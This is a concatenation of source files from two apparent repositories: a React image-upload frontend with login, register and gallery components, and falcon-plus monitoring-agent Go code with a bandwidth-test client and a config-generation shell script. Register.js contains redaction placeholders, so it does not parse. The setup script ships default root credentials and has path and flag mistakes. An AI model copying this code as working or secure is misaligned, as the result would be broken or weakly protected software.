  // caught here — the inner awaits would need their own try/catch.
  useEffect(() => {
    try {
      const checkLoginuser=async()=>{
        // Seed localStorage with a blank token the first time around so the
        // header below always has a string value.
        let token=window.localStorage.getItem('auth-token');
        if(token === null){
          window.localStorage.setItem("auth-token"," ");
          token=""
        }
        const tokenresponse=await axiox.post("https://mern-image-upload.herokuapp.com/api/v1/user/tokenIsvalid",null,{headers:{"x-auth-token":token}})
        if(tokenresponse.data){
          // Token is valid: load the profile and publish it to context.
          const userRes=await axiox.get("https://mern-image-upload.herokuapp.com/api/v1/user/",{headers:{"x-auth-token":token}})
          window.localStorage.setItem('id',userRes.data.id)
          setuserData({
            token,
            userName:userRes.data.name,
            userEmail:userRes.data.email,
            userId:userRes.data.id
          })
        }
      }
      checkLoginuser()
    } catch (error) {
      console.log(error);
    }
  }, [setuserData])

  return (
    <>
      <BrowserRouter>
        <Usercontext.Provider value={{userData,setuserData}} >
          <Switch>
            <Route path="/register" component={Register}/>
            <Route path="/" exact component={Login}/>
            <Route path="/login" component={Login}/>
            <Route path="/accessuser" exact component={Home}/>
            <Redirect to="/accessuser" />
          </Switch>
        </Usercontext.Provider>
      </BrowserRouter>
    </>
  )
}

export default App
<file_sep>
// Header.js — sticky top bar: logo, avatar + user name from context, and a
// logout button that clears the stored token and returns to /login.
import React, { useContext } from "react";
import { useHistory } from "react-router-dom";
import ExitToAppIcon from "@material-ui/icons/ExitToApp";
import logo from "../Asserts/Network.png";
import Usercontext from "../Context/Usercontext";
import "./header.css";

function Header() {
  const history = useHistory();
  const { userData } = useContext(Usercontext);
  // Logout: drop the JWT and navigate to the login screen.
  const handellogout = () => {
    window.localStorage.removeItem("auth-token");
    history.push("/login");
  };
  // NOTE(review): the avatar URL reads `userData.userID`, but the state shape
  // in App.js defines `userId` (lowercase d) — so this interpolates
  // `undefined` and every user gets the same avatar seed. Confirm and align
  // the casing.
  return (
    <div
      className="search__bar"
      style={{
        display: "flex",
        position: "sticky",
        top: "-1px",
        backgroundColor: "#000000",
        zIndex: "10",
      }}
    >
      <img src={logo} alt="logo" width="200px" className="logo" />
      <div className="ml-auto pt-2 d-flex aligh-center">
        <img
          src={`https://avatars.dicebear.com/4.5/api/avataaars/${userData.userID}fsdffgfdfc.svg`}
          alt=".."
          width="30px"
        />{" "}
        <h5 className=" text-white pt-2 user_name">{userData.userName}</h5>
      </div>
      <button
        className="btn btn-danger ml-auto mr-3 "
        data-bs-toggle="tooltip"
        data-bs-placement="bottom"
        title="Logout"
        onClick={handellogout}
      >
        <ExitToAppIcon className="exit_btn" />
      </button>
    </div>
  );
}

export default Header;
<file_sep>
// Displayimage.js — grid of uploaded images with like / delete actions.
import React, { useEffect, useState } from "react";
import axios from "axios";
import IconButton from "@material-ui/core/IconButton";
import FavoriteBorderIcon from "@material-ui/icons/FavoriteBorder";
import { useHistory } from "react-router-dom";
import SendIcon from "@material-ui/icons/Send";
import BookmarkBorderIcon from "@material-ui/icons/BookmarkBorder";
import DeleteForeverIcon from "@material-ui/icons/DeleteForever";
import style from "./Displayimage.module.css";

function Displayimage(props) {
  const [serverData, setserverData] = useState([]);
  let history = useHistory();
  // Fetch the image list on mount and whenever the parent signals a new
  // upload via props.serverRes (used only as an effect dependency here).
  useEffect(() => {
    try {
      const getuserimage = async () => {
        try {
          const serverRes = await axios.get(
            "https://mern-image-upload.herokuapp.com/api/v1/user/image/server/"
          );
          setserverData(serverRes.data);
        } catch (error) {
          console.log(error);
        }
      };
      getuserimage();
    } catch (error) {
      console.log(error);
    }
  }, [props.serverRes, setserverData]);

  // Like an image, then re-fetch the whole list so the count refreshes.
  const handellike = async (id) => {
    await axios.post(
      `https://mern-image-upload.herokuapp.com/api/v1/user/likes/${id}`
    );
    // get like data
    const serverRes = await axios.get(
      "https://mern-image-upload.herokuapp.com/api/v1/user/image/server/"
    );
    setserverData(serverRes.data);
  };

  // Delete an image by id, then navigate away.
  // NOTE(review): the push target "/accessusers" (plural, continued on the
  // next source line) matches no registered route; App.js's <Redirect> sends
  // it back to "/accessuser", which masks the typo. Confirm intent.
  let deleteimage = async (id) => {
    await axios.delete(
      // (continuation of deleteimage's axios.delete call from the previous line)
      `https://mern-image-upload.herokuapp.com/api/v1/user/delete/image/${id}`
    );
    history.push("/accessusers");
  };

  // Render: loading placeholder until data arrives, then one Bootstrap card
  // per image with like / share / delete / bookmark controls and a footer
  // showing like count, uploader comment and creation time.
  return (
    <div className="container">
      <div className="row">
        {serverData.length === 0 ? (
          <p>loading..</p>
        ) : (
          serverData.map((images) => {
            return (
              <div className="col-md-4 mt-4" key={images._id}>
                <div className={`${style.card_group} card-group`}>
                  <div className="card ">
                    <img
                      src={images.uploadimages}
                      className="card-img-top"
                      alt="..."
                    />
                    <div
                      className="card-body "
                      style={{ backgroundColor: "black", color: "white" }}
                    >
                      <div className="socialmedia_row d-flex ">
                        <p>
                          {
                            <IconButton
                              className="text-white"
                              onClick={() => handellike(images._id)}
                              data-bs-toggle="tooltip"
                              data-bs-placement="bottom"
                              title="Like"
                            >
                              <FavoriteBorderIcon />
                            </IconButton>
                          }
                        </p>
                        <p>
                          {
                            <IconButton className="text-white">
                              <SendIcon />
                            </IconButton>
                          }
                        </p>
                        <p>
                          {
                            <IconButton
                              className={`${style.deletebtn} text-white`}
                              onClick={() => deleteimage(images._id)}
                              data-bs-toggle="tooltip"
                              data-bs-placement="bottom"
                              title="Delete"
                            >
                              <DeleteForeverIcon />
                            </IconButton>
                          }
                        </p>
                        <p className="ml-auto">
                          {
                            <IconButton className="text-white">
                              <BookmarkBorderIcon />
                            </IconButton>
                          }
                        </p>
                      </div>
                      <div className={`${style.image_footer}`}>
                        <small style={{ position: "relative", top: "-18px" }}>
                          {images.likes} likes
                        </small>
                        <br />
                        <div className={`${style.comment_area}`}>
                          <small>
                            <strong>{images.name} :- </strong>
                            {images.comments}
                          </small>
                          <br />
                          <small style={{ fontSize: "10px" }}>
                            {new Date(images.createdAt).toLocaleString()}
                          </small>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            );
          })
        )}
      </div>
    </div>
  );
}

export default Displayimage;
<file_sep>
// Register.js — signup form (desktop layout + duplicated responsive layout).
// Registers the user, immediately logs in, stores the JWT and navigates on.
// NOTE(review): the `<PASSWORD>` tokens below are dataset-redaction
// artifacts (the archived corpus scrubbed secret-looking identifiers); this
// file does not parse as-is and the originals must be restored from the
// upstream repo before reuse.
import React, { useState, useContext } from "react";
import axios from "axios";
import Usercontext from "../Context/Usercontext";
import { useHistory } from "react-router-dom";
import style from "./Register.module.css";
import "../../node_modules/bootstrap/dist/css/bootstrap.min.css";
import network from "../Asserts/Network.png";
import validator from "validator";
import Errorhandel from '../Errorhandel'
import backgroundimage from "../Asserts/backgroundimage.png";

function Register() {
  const [name, setname] = useState();
  const [email, setemail] = useState();
  const [password, setpassword] = useState();
  const [confirmpassword, setconfirmpassword] = useState();
  const [errorMessage, setErrorMessage] = useState("");  // password-strength hint
  const [Error,setError]=useState()                      // backend error banner
  const histroy = useHistory();  // NOTE(review): misspelling of "history"; used consistently

  const handel_login = () => {
    histroy.push("/login");
  };

  const { setuserData } = useContext(Usercontext);

  // Create the account, then log straight in and publish the session.
  const handelsubmit = async (e) => {
    e.preventDefault();
    try {
      await axios.post("https://mern-image-upload.herokuapp.com/api/v1/user/post/data/", {
        name: name,
        email: email,
        password: <PASSWORD>,
        confirmpassword:<PASSWORD>
      });
      const userRes = await axios.post(
        "https://mern-image-upload.herokuapp.com/api/v1/user/login",
        {
          email,
          password,
        }
      );
      console.log(userRes);
      setuserData({
        token: userRes.data.token,
        userName: userRes.data.user.name,
        userEmail:userRes.data.user.email
      });
      window.localStorage.setItem("auth-token", userRes.data.token);
      histroy.push("/accessuser/*");
    } catch (error) {
      // serError(error.Response.msg)
      // Log `error.response` to inspect the payload: the backend puts its
      // message in error.response.data.msg.
      // NOTE(review): `error.response` is undefined for network-level
      // failures, so this line can itself throw — guard it.
      error.response.data.msg &&
      setError( error.response.data.msg)
    }
  };

  // Live password-strength feedback via the `validator` package.
  const handelpassword = (e) => {
    setpassword(e.target.value);
    if (
      validator.isStrongPassword(e.target.value, {
        minLength: 5,
        minLowercase: 1,
        minUppercase: 1,
        minNumbers: 1,
        minSymbols: 1,
      })
    ) {
      setErrorMessage("Is Strong Password");
    } else {
      setErrorMessage("Is Not Strong Password");
    }
  };

  // NOTE(review): in the JSX below, `for=` should be `htmlFor=` and the bare
  // `span` attribute on <p> is invalid — React will warn at runtime.
  return (
    <>
      <header className={`${style.header}`}>
        <div className="row">
          <div className={`col-sm-6 ${style.leftside_container}`}>
            <img src={backgroundimage} className="img-fluid" alt="backgroundimage" />
          </div>
          <div className="col-md-4 ml-5" style={{height:"auto"}}>
            <img src={network} alt="sad network" className="my-3" width="200px" />
            {Error && <Errorhandel message={Error} clearError={() => setError(undefined)}/>}
            <form onSubmit={handelsubmit}>
              <h3 className="py-2" style={{textShadow:"2px 3px 3px rgb(180, 192, 192)"}}><strong>Create an accound</strong></h3>
              <div className="mb-3 mt-4">
                <label className="form-label">
                  <b>FullName</b>
                </label>
                <input type="text" className="form-control" name="name" placeholder="Enter your fullname" onChange={(e) => setname(e.target.value)} />
              </div>
              <div className="mb-3 mt-4">
                <label className="form-label">
                  <b>Email Address</b>
                </label>
                <input type="email" className="form-control" name="email" placeholder="Enter your email address" onChange={(e) => setemail(e.target.value)} aria-describedby="emailHelp" />
              </div>
              <div className="mb-3 mt-4">
                <label className="form-label">
                  <b>Password</b>
                </label>
                <input type="<PASSWORD>" className="form-control" name="password" placeholder="Enter password" onChange={handelpassword} />
              </div>
              <div className="mb-3 mt-4">
                <label className="form-label">
                  <b>Confirm password</b>
                </label>
                <input type="password" className="form-control" name="password" placeholder="Enter confirmpassword" onChange={(e) => setconfirmpassword(e.target.value)} />
              </div>
              <p span style={{
                  fontWeight: "bold",
                  color: "red",
                  paddingLeft: "5px",
                  fontSize: "15px",
                }} >
                {errorMessage}
              </p>
              <div className="mb-3 form-check">
                <input type="checkbox" className="form-check-input" id="exampleCheck1" />
                <label className="form-check-label" for="exampleCheck1">
                  I accept the Privacy Policy and the Terms of Service
                </label>
              </div>
              <button className={`${style.signin_btn}`} type="submit">
                Signin
              </button>
              <p className="pt-3 pl-2">
                Have an accound?
                <strong onClick={handel_login} className={`${style.loginbtn}`}>
                  Login
                </strong>
              </p>
              <p style={{ fontSize: "15px" ,paddingBottom:"10px"}}>
                We'll never share your email with anyone else.
              </p>
            </form>
          </div>
        </div>
      </header>
      {/* media query screen */}
      <div className={`${style.responsive_screen} `}>
        <p className={`${style.p}`}></p>
        <img src={network} alt="sad network" className="my-2" width="200px" />
        <h3 className={`py-2 ${style.h3}`} style={{textShadow:"2px 3px 3px rgb(180, 192, 192)"}}>Create an accound</h3>
        {Error && <Errorhandel message={Error} clearError={() => setError(undefined)}/>}
        <form onSubmit={handelsubmit}>
          <div className="mb-3">
            <label for="exampleInputEmail1" className="form-label">
              <b>FullName</b>
            </label>
            <input type="text" id="exampleInputEmail1" className="form-control" name="name" placeholder="Enter your fullname" onChange={(e) => setname(e.target.value)} />
          </div>
          <div className="mb-3">
            <label for="exampleInputEmail1" className="form-label">
              <b> Email address</b>
            </label>
            <input type="email" className="form-control" id="exampleInputEmail1" name="email" placeholder="Enter your email address" onChange={(e) => setemail(e.target.value)} aria-describedby="emailHelp" />
          </div>
          <div className="mb-3 ">
            <label for="exampleInputPassword1" className="form-label">
              <b>Password</b>
            </label>
            <input type="password" className="form-control" id="exampleInputPassword1" name="password" placeholder="Enter password" onChange={handelpassword} />
          </div>
          <div className="mb-3">
            <label className="form-label">
              <b>Confirm password</b>
            </label>
            <input type="password" className="form-control" name="password" placeholder="Enter <PASSWORD>" onChange={(e) => setconfirmpassword(e.target.value)} />
          </div>
          <p span style={{
              fontWeight: "bold",
              color: "red",
              paddingLeft: "5px",
              fontSize: "15px",
            }} >
            {errorMessage}
          </p>
          <button className={`${style.signin_btn}`} type="submit">
            Signin
          </button>
          <p className="pt-3 pl-2">
            Have an accound?
            <strong onClick={handel_login} className={`${style.loginbtn}`}>
              Login
            </strong>
          </p>
          <p style={{ fontSize: "15px" ,paddingBottom:"10px"}}>
            We'll never share your email with anyone else.
          </p>
        </form>
      </div>
      {/* media query screen */}
    </>
  );
}

export default Register;
<file_sep>
// Errorhandel.js — small dismissible error banner: shows `props.message` and
// calls `props.clearError` when the cancel icon is clicked.
import React from 'react'
import CancelIcon from '@material-ui/icons/Cancel';

function Errorhandel(props) {
  return (
    <div>
      <strong className="text-danger " >{props.message}</strong>
      <p onClick={props.clearError} style={{paddingLeft:"3px",cursor:"pointer",color:"red"}}>
        < CancelIcon/>
      </p>
    </div>
  )
}

export default Errorhandel
<file_sep>
// Login.js — login form (desktop layout + duplicated responsive layout).
// Authenticates against the backend, stores the JWT and publishes the
// session through Usercontext.
import React, { useState, useContext } from "react";
import { useHistory } from "react-router-dom";
import axios from "axios";
// import "../../node_modules/bootstrap/dist/css/bootstrap.css";
import "../../node_modules/bootstrap/dist/css/bootstrap.min.css";
import Usercontext from "../Context/Usercontext";
import Errorhandel from "../Errorhandel";
import style from "./Login.module.css";
import backgroundimage from "../Asserts/backgroundimage.png";
import network from "../Asserts/Network.png";

function Login() {
  const [email, setemail] = useState();
  const [password, setpassword] = useState();
  const [loginError, setloginError] = useState();  // backend error banner
  const history = useHistory();
  const { setuserData } = useContext(Usercontext);

  const handel_signin = () => {
    history.push("/register");
  };

  // Log in, persist the token, and navigate to the app.
  // NOTE(review): as in Register.js, `error.response` is undefined on
  // network-level failures, so the catch body can itself throw — guard it.
  const submit = async (e) => {
    e.preventDefault();
    try {
      const userRes = await axios.post(
        "https://mern-image-upload.herokuapp.com/api/v1/user/login",
        {
          email,
          password,
        }
      );
      setuserData({
        token: userRes.data.token,
        userName: userRes.data.user.name,
        userEmail: userRes.data.user.email,
      });
      window.localStorage.setItem("auth-token", userRes.data.token);
      history.push("/accessuser/*");
    } catch (error) {
      error.response.data.passwordmsg &&
        setloginError(error.response.data.passwordmsg);
    }
  };

  // NOTE(review): `for=` in the JSX below should be `htmlFor=` — React warns.
  return (
    <>
      <header className={` ${style.header__container}`}>
        <div className="row">
          <div className={`col-sm-1 ${style.top_position}`}>.</div>
          <div className={`col-md-3 ${style.login_form}`} style={{ marginTop: "10px" }} >
            <img src={network} alt="sad network" className="my-5" width="200px" />
            <form onSubmit={submit}>
              {loginError && (
                <Errorhandel
                  message={loginError}
                  clearError={() => setloginError(undefined)}
                />
              )}
              <h3 className={`${style.form_header}`}>Login your accound</h3>
              <div className="mb-3 mt-3">
                <label className="form-label">
                  <b>Email Address</b>
                </label>
                <input type="email" className="form-control" name="email" required placeholder="Enter email address" onChange={(e) => setemail(e.target.value)} aria-describedby="emailHelp" />
              </div>
              <div className="mb-3">
                <label className="form-label">
                  <b>Password</b>
                </label>
                <input type="password" required placeholder="Enter password" onChange={(e) => setpassword(e.target.value)} className="form-control" />
              </div>
              <button className={`${style.login_btn}`} type="submit">
                Login
              </button>
              <p className="pt-4 pb-2 ">
                Dont't have an accound?
                <strong onClick={handel_signin} style={{
                    cursor: "pointer",
                    color: "red",
                    paddingLeft: "5px",
                  }} >
                  Signin
                </strong>
              </p>
            </form>
          </div>
          <div className={`col-md-8 ${style.rightside_container}`}>
            <img src={backgroundimage} className="img-fluid" alt="backgroundimage" />
          </div>
        </div>
      </header>
      {/* media query screen */}
      <div className={`${style.responsive_screen}`}>
        <p className={`${style.p}`}></p>
        <img src={network} alt="sad network" className="my-3" width="200px" />
        <h3 className={`${style.form_header}`}>Login your accound</h3>
        <form onSubmit={submit}>
          {loginError && (
            <Errorhandel
              message={loginError}
              clearError={() => setloginError(undefined)}
            />
          )}
          <div className="mb-3">
            <label for="exampleInputEmail1" className="form-label">
              Email address
            </label>
            <input type="email" className="form-control" id="exampleInputEmail1" placeholder="Enter email address" name="email" required onChange={(e) => setemail(e.target.value)} aria-describedby="emailHelp" />
          </div>
          <div className="mb-3">
            <label for="exampleInputPassword1" className="form-label">
              Password
            </label>
            <input type="password" className="form-control" id="exampleInputPassword1" placeholder="Enter password" required onChange={(e) => setpassword(e.target.value)} />
          </div>
          <button className={`${style.login_btn}`} type="submit">
            Login
          </button>
          <p className="pt-4 pb-2 ">
            Dont't have an accound?
            <strong onClick={handel_signin} style={{
                cursor: "pointer",
                color: "red",
                paddingLeft: "5px",
              }} >
              Signin
            </strong>
          </p>
        </form>
      </div>
      {/* media query screen */}
    </>
  );
}

export default Login;
eea7cb0c130baa949cca60160ef69c7a57e739ee
[ "JavaScript" ]
6
JavaScript
Jranjangudu/image-uploaded-clientsite
aee26cf90441361f0c26772fd3ba7569e356a312
e2d5358d5559a0bf8431ff3367db0a70e19d1136
refs/heads/master
<repo_name>liyongcun/falcon-plus<file_sep>/modules/agent/g/cfg.go // Copyright 2017 Xiaomi, Inc. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package g import ( "encoding/json" "log" "os" "os/exec" "strings" "sync" "github.com/toolkits/file" ) type Ssh struct { Ip_addr string `json:"ip_addr"` Ip_port int `json:"ip_port"` User string `json:"user"` Password string `json:"<PASSWORD>"` Path string `json:"path"` PrivateKey string `json:"privatekey"` } type PluginConfig struct { Enabled bool `json:"enabled"` Dir string `json:"dir"` Ssh Ssh `json:"ssh"` LogDir string `json:"logs"` } type HeartbeatConfig struct { Enabled bool `json:"enabled"` Addr string `json:"addr"` Interval int `json:"interval"` Timeout int `json:"timeout"` } type TransferConfig struct { Enabled bool `json:"enabled"` Addrs []string `json:"addrs"` Interval int `json:"interval"` Timeout int `json:"timeout"` } type HttpConfig struct { Enabled bool `json:"enabled"` Listen string `json:"listen"` Backdoor bool `json:"backdoor"` } type CollectorConfig struct { IfacePrefix []string `json:"ifacePrefix"` MountPoint []string `json:"mountPoint"` } type Net_speed struct { IsServer bool `json:"isServer"` IsTest bool `json:"isTest"` BufLen string `json:"bufflength"` Duration int `json:"duration"` Threads int `json:"threads"` Port int `json:"port"` Interval int `json:"interval"` } type GlobalConfig struct { Debug bool `json:"debug"` Hostname string `json:"hostname"` IP string `json:"ip"` Hostname2ip bool 
`json:"hostname2ip"` Plugin *PluginConfig `json:"plugin"` Heartbeat *HeartbeatConfig `json:"heartbeat"` Transfer *TransferConfig `json:"transfer"` Http *HttpConfig `json:"http"` Collector *CollectorConfig `json:"collector"` DefaultTags map[string]string `json:"default_tags"` IgnoreMetrics map[string]bool `json:"ignore"` Net_speed *Net_speed `json:"net_speed"` } var ( ConfigFile string config *GlobalConfig lock = new(sync.RWMutex) ) func Config() *GlobalConfig { lock.RLock() defer lock.RUnlock() return config } func Hostname() (string, error) { if Config().Hostname2ip { return IP(), nil } hostname := Config().Hostname if hostname != "" { return hostname, nil } if os.Getenv("FALCON_ENDPOINT") != "" { hostname = os.Getenv("FALCON_ENDPOINT") return hostname, nil } hostname, err := os.Hostname() if err != nil { log.Println("ERROR: os.Hostname() fail", err) } hostname_bak := IP() if strings.Contains(hostname, "localhost") && len(hostname_bak) > 7 && hostname_bak != "127.0.0.1" { hostname = hostname_bak } return hostname, err } func Real_Hostname() (string, error) { hostname := Config().Hostname if hostname != "" { return hostname, nil } if os.Getenv("FALCON_ENDPOINT") != "" { hostname = os.Getenv("FALCON_ENDPOINT") return hostname, nil } hostname, err := os.Hostname() if err != nil { log.Println("ERROR: os.Hostname() fail", err) } hostname_bak := IP() if strings.Contains(hostname, "localhost") && len(hostname_bak) > 7 && hostname_bak != "127.0.0.1" { hostname = hostname_bak } return hostname, err } func IP() string { ip := Config().IP if ip != "" { // use ip in configuration return ip } if len(LocalIp) > 0 { ip = LocalIp } var host_ip string = "" out, err := exec.Command("hostname", "--all-ip-addresses").Output() if err == nil { ip_list := strings.Split(strings.Replace(string(out), "\n", "", -1), " ") for vv := range ip_list { if ip_list[vv] == "127.0.0.1" || ip_list[vv] == "::1" || strings.Contains(ip_list[vv], "localhost") || len(ip_list[vv]) < 5 { continue } host_ip = 
ip_list[vv] break } } else { log.Println("hostname --all-ip-addresses err" + err.Error()) } //log.Printf(" get system ip %s --- real ip %s",host_ip,ip) if (ip == "127.0.0.1" || ip == "::1" || ip == "localhost") && len(host_ip) > 1 { ip = host_ip } return ip } func ParseConfig(cfg string) { if cfg == "" { log.Fatalln("use -c to specify configuration file") } if !file.IsExist(cfg) { log.Fatalln("config file:", cfg, "is not existent. maybe you need `mv cfg.example.json cfg.json`") } ConfigFile = cfg configContent, err := file.ToTrimString(cfg) if err != nil { log.Fatalln("read config file:", cfg, "fail:", err) } var c GlobalConfig err = json.Unmarshal([]byte(configContent), &c) if err != nil { log.Fatalln("parse config file:", cfg, "fail:", err) } lock.Lock() defer lock.Unlock() config = &c log.Println("read config file:", cfg, "successfully") } <file_sep>/modules/agent/speedtest/client.go package speedtest // author liyc // 客户端只管发,然后发送结束标识,server返回结束标识,如果收到结束标识,标识收取完成,总的数据量=buff+flag_size*2 // 时间=(收到标识,time)-start //本期只支持client->server 模式 import ( log "github.com/Sirupsen/logrus" "github.com/open-falcon/falcon-plus/common/model" "github.com/open-falcon/falcon-plus/modules/agent/g" . 
"io/ioutil"
	"math"
	"net"
	"path/filepath"
	"strconv"
	"strings"
	"sync"
	"sync/atomic"
	"time"
)

// data accumulates bytes successfully written during one measurement round.
// It is reset before each target and updated atomically by the sender goroutines.
var data uint64 = 0

// runDurationTimer closes toStop after d, ending one measurement round.
// A zero duration means "no limit": the channel is never signalled.
func runDurationTimer(d time.Duration, toStop chan int) {
	go func() {
		dSeconds := uint64(d.Seconds())
		if dSeconds == 0 {
			return
		}
		time.Sleep(d)
		toStop <- 1
		close(toStop)
	}()
}

// Client runs the bandwidth test loop: it reads the peer list from
// <plugin dir>/ethr_client.txt, blasts each peer with Net_speed.Threads
// TCP senders for Net_speed.Duration seconds, and pushes the measured
// throughput (Mib/s) to transfer as metric "network.test".
func Client() {
	var wg sync.WaitGroup
	port := ":" + strconv.Itoa(g.Config().Net_speed.Port)
	buffersize := unitToNumber(g.Config().Net_speed.BufLen)
	for {
		var client_list []string
		log.Info(filepath.Join(g.Config().Plugin.Dir, "/ethr_client.txt"))
		if contents, err := ReadFile(filepath.Join(g.Config().Plugin.Dir, "/ethr_client.txt")); err == nil {
			client_list = strings.Split(string(contents), "\n")
		} else {
			log.Error("打开测试客户端列表的文件打开失败" + g.Config().Plugin.Dir + "/ethr_client.txt" + err.Error())
			break
		}
		for vv := range client_list {
			if len(client_list[vv]) < 5 {
				log.Error("err client addr", client_list[vv])
				continue
			}
			log.Info("client begin client ----------", client_list[vv])
			startTime := time.Now()
			data = 0
			log.Printf("client begin with %d threads", g.Config().Net_speed.Threads)
			toStop := make(chan int, 1)
			log.Debug("run time is ", g.Config().Net_speed.Duration)
			runDurationTimer(time.Duration(g.Config().Net_speed.Duration)*time.Second, toStop)
			for th := 0; th < g.Config().Net_speed.Threads; th++ {
				buff := make([]byte, buffersize)
				for i := uint64(0); i < buffersize; i++ {
					buff[i] = byte(i)
				}
				wg.Add(1)
				go func() {
					// FIX: Done must fire when the goroutine finishes, not right
					// after dialing — otherwise wg.Wait() returned immediately
					// and throughput was computed before the duration elapsed,
					// while senders were still racing on `data`.
					defer wg.Done()
					server := "[" + client_list[vv] + "]" + port
					log.Info("begin to test to " + server)
					conn, err := net.Dial("tcp", server)
					if err != nil {
						// FIX: was log.Fatalf, which killed the whole agent
						// because one peer was unreachable.
						log.Errorf("Could not connect: %s", err)
						return
					}
					defer conn.Close()
				ExitForLoop:
					for {
						select {
						case <-toStop:
							log.Debug(" there is break")
							break ExitForLoop
						default:
							w, err := SendData(conn, buff)
							if err != nil {
								log.Printf("Error: %s", err)
							} else {
								atomic.AddUint64(&data, uint64(w))
							}
						}
					}
				}()
			}
			wg.Wait()
			usedtime := time.Since(startTime)
			// FIX: read the counter atomically, pairing with AddUint64 above.
			total := atomic.LoadUint64(&data)
			ratio := float64(float64(total*8)/usedtime.Seconds()) / 1000.0 / 1000.0
			log.Printf("---Throughput--: %fMib/s --- %d", ratio, total)
			mvs := model.MetricValue{
				g.IP(), "network.test", math.Trunc(ratio),
				int64(g.Config().Net_speed.Interval), "GAUGE",
				g.IP() + "." + client_list[vv], time.Now().Unix()}
			var metrics []*model.MetricValue
			metrics = append(metrics, &mvs)
			g.SendToTransfer(metrics)
			time.Sleep(10 * time.Second)
		}
		time.Sleep(time.Duration(g.Config().Net_speed.Interval) * time.Second)
	}
}
<file_sep>/config/confgen.sh
#!/bin/bash
#特别说明,上部分为监听端口,如果sever主机部署,请修改对应的下面的addr的信息,
# 例如tarsfer的监听为8433,则下面地址要对应修改
# ssh 的原路径,目标路径,需要为非“连接的路径,即软连接(ln)”,这点很重要,不然不能同步
confs=(
    #插件相关的信息
    '%%PLUGIN_IP%%=127.0.0.1'
    #插件同步的ssh端口,一般为22号端口
    '%%PLUGIN_PORT%%=22'
    #插件同步的ssh用户
    '%%PLUGIN_USER%%=root'
    #插件同步的ssh密码,如果配置为key的模式,密码可以为空
    '%%PLUGIN_PASSWD%%=root'
    # 插件的同步源地址
    '%%PLUGIN_PATH%%=/root'
    #插件的ssh同步私有key,如果用key回话,则必须要填写
    '%%SSH_PRIVATEKEY%%=' #/home/user/.ssh/rsa
    #监听端口,注意“0.0.0.0”
    #客户端监听ip地址,这个端口支持第三方数据,push到agent_http端口上,这个地址在前台写死的,建议不要修改,
    # 如果要修改,就需要修改前台的端口号
    '%%AGENT_HTTP%%=0.0.0.0:1988'
    #集群合并信息的http的监听地址
    '%%AGGREGATOR_HTTP%%=0.0.0.0:6055'
    #图的http监听地址
    '%%GRAPH_HTTP%%=0.0.0.0:6071'
    #图的rpc监听地址
    '%%GRAPH_RPC%%=0.0.0.0:6070'
    #心跳服务的http监听地址
    '%%HBS_HTTP%%=0.0.0.0:6031'
    #心跳的rpc服务监听地址
    '%%HBS_RPC%%=0.0.0.0:6030'
    #告警判断服务的http监听地址
    '%%JUDGE_HTTP%%=0.0.0.0:6081'
    #告警判断服务的rpc监听地址
    '%%JUDGE_RPC%%=0.0.0.0:6080'
    #空数据监控的http监听端口
    '%%NODATA_HTTP%%=0.0.0.0:6090'
    #发送组件的http监听地址
    '%%TRANSFER_HTTP%%=0.0.0.0:6060'
    #发送组件的rpc监听地址
    '%%TRANSFER_RPC%%=0.0.0.0:8433'
    #API接口的http监听地址
    '%%PLUS_API_HTTP%%=0.0.0.0:8080'
    #告警组件的http监听地址
    '%%ALARM_HTTP%%=0.0.0.0:9912'
    #配置转发的gateway地址
    '%%GATEWAY_HTTP%%=0.0.0.0:16060'
    '%%GATEWAY_RPC%%=0.0.0.0:18433'
    '%%GATEWAY_SOCKET%%=0.0.0.0:14444'
    #网络测速端口
    '%%NET_SPEED_PORT%%=10009'
    #配置地址类
    '%%HBS_ADDR%%=127.0.0.1:6030'
    '%%REDIS%%=127.0.0.1:6379'
    '%%TRANSFER_ADDR%%=127.0.0.1:8433'
    '%%MYSQL%%=root:@tcp(127.0.0.1:3306)'
    '%%PLUS_API_DEFAULT_TOKEN%%=default-token-used-in-server-side'
    '%%API_ADDR%%=127.0.0.1:8080'
    '%%DASHBOARD_HTTP%%=127.0.0.1:8081'
    #图的地址列表用逗号分隔,json的list格式,注意双引号
'%%GRAPH_ADDRS%%=127.0.0.1:6070' #如果有多台agent,则有多个地址,建议只有一个agent提供服务,如果有多个agent,则建议根据资源,带宽,选择填写一台 '%%PUSH_ADDR%%=127.0.0.1:1988' #tsdb地址,如果有发送到tsdb的需求,请修改transfer的配置文件,发送到tsdb, '%%TSDB_ADDR%%=127.0.0.1:8088' ) configurer() { for i in "${confs[@]}" do search="${i%%=*}" replace="${i##*=}" uname=`uname` if [ "$uname" == "Darwin" ] ; then # Note the "" and -e after -i, needed in OS X find ./*.json -type f -exec sed -i .tpl -e "s/${search}/${replace}/g" {} \; else find ./*.json -type f -exec sed -i "s#${search}#${replace}#g" {} \; fi done } init_db(){ #数据库初始化 # Falcon+ mysql_cmd=`which mysql` if [ ${#mysql_cmd} -lt 3 ] then echo "没有发现mysql命令,请手动执行数据库初始化" return else ip="127.0.0.1" port=3306 user="root" passwd="" for i in "${confs[@]}" do search="${i%%=*}" replace="${i##*=}" if [ ${search} == '%%MYSQL%%' ] then echo "mysql 信息如下: "+${replace} user=`echo ${replace}|awk -F':' '{print $1}'` passwd=`echo ${replace}|awk -F'@' '{print $1}'|awk -F':' '{print $2}'` ip=`echo ${replace}|awk -F'@' '{print $2}'|sed -e 's/tcp(//' -e 's/)//' |awk -F':' '{print $1}'` port=`echo ${replace}|awk -F'@' '{print $2}'|sed -e 's/tcp(//' -e 's/)//' |awk -F':' '{print $2}'` break else continue fi done mysql -h ${ip} -u ${user} -P ${port} -p ${passwd} < ../mysq/db_schema/1_uic-db-schema.sql mysql -h ${ip} -u ${user} -P ${port} -p ${passwd} < ../mysq/db_schema/2_portal-db-schema.sql mysql -h ${ip} -u ${user} -P ${port} -p ${passwd} < ../mysq/db_schema/3_dashboard-db-schema.sql mysql -h ${ip} -u ${user} -P ${port} -p ${passwd} < ../mysq/db_schema/4_graph-db-schema.sql mysql -h ${ip} -u ${user} -P ${port} -p ${passwd} < ../mysq/db_schema/5_alarms-db-schema.sql fi } configurer init_db<file_sep>/modules/agent/http/plugin.go // Copyright 2017 Xiaomi, Inc. // // Licensed under the Apache License, Version 2.0 (the "License"); 